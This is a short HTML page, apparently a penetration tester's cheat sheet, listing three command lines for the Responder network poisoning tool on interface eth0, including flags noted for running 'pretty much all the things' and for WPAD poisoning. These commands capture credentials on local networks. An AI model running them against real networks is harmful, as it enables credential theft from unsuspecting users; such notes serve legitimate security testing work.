<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Responder</title>
</head><body>responder -i eth0<br/>
<br/>
responder -v -F -f -r -w -b &nbsp;-I eth0 &nbsp;- this will run pretty much all the things<br/>
<br/>
responder -I eth0 -wFb - This is good for WPAD Poisoning<br/>
<br/>
<br/>
<br/>
</body></html>